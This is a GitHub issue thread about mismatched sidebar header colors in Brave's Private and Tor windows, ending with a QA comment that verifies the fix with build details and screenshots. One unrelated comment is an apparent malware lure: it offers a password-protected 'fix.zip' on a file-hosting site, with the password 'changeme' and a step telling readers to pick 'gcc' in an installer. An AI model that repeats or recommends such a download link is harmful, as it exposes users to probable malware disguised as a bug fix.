### ISSUE TITLE
[Nala]: Fix sidebar colors

### ISSUE THREAD

**Issue by fallaciousreasoning** [brave/brave-browser#40749]
The sidebar colors are off in Private/Tor windows when the browser is in light mode because the theme for the Sidebar doesn't match the theme passed into the color mixer.

This results in a weird header color for the sidebar

**Note:** We should have a think about:
1. Whether is actually makes sense to show these pages in Private mode
2. Whether we want these pages to follow the non-Private theme color

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fallaciousreasoning** [comment]
This issue was found by @simonhong in https://github.com/brave/brave-core/pull/25337#issuecomment-2316559929

**Comment by MadhaviSeelam** [comment]
Verification `PASSED` using
```
Brave | 1.71.110 Chromium: 129.0.6668.100 (Official Build) beta (64-bit)
-- | --
Revision | 46cd0b1af7127687895fcaceff93dd80e29e6f2b
OS | Windows 11 Version 23H2 (Build 22631.4317)
```

Verified from the testplan https://github.com/brave/brave-core/pull/25372#issue-2493359231 in both light and dark modes.

Confirmed the headers of Bookmarks & Reading list do not have yellow color background for both Private & Tor Windows

**_Bookmarks_**

Private/Tor - Light | Private/Tor - Dark 
---- | ----
![Image](https://github.com/user-attachments/assets/a45e4014-4e4c-4a36-960b-85c9c89f595e)|![Image](https://github.com/user-attachments/assets/fe1e128c-b667-4491-8597-7c06b72033c3)|
![Image](https://github.com/user-attachments/assets/87fe719f-5971-4344-b041-b2f8ffdec372)|![Image](https://github.com/user-attachments/assets/8b664f03-69c8-4a76-93d4-04847be0cc0d)


**_Reading list_**

Private/Tor - Light | Private/Tor - Dark 
---- | ----
![Image](https://github.com/user-attachments/assets/07eb8df4-34e3-45b2-951f-24d17a66db79)|![Image](https://github.com/user-attachments/assets/041dde71-c579-4c0c-adec-1901ab42ebf0)
![Image](https://github.com/user-attachments/assets/ac7dfbcb-5532-46b3-9b45-5792622d80e1)|![Image](https://github.com/user-attachments/assets/d9819bdd-960b-4447-8faf-27ae369a88a2)
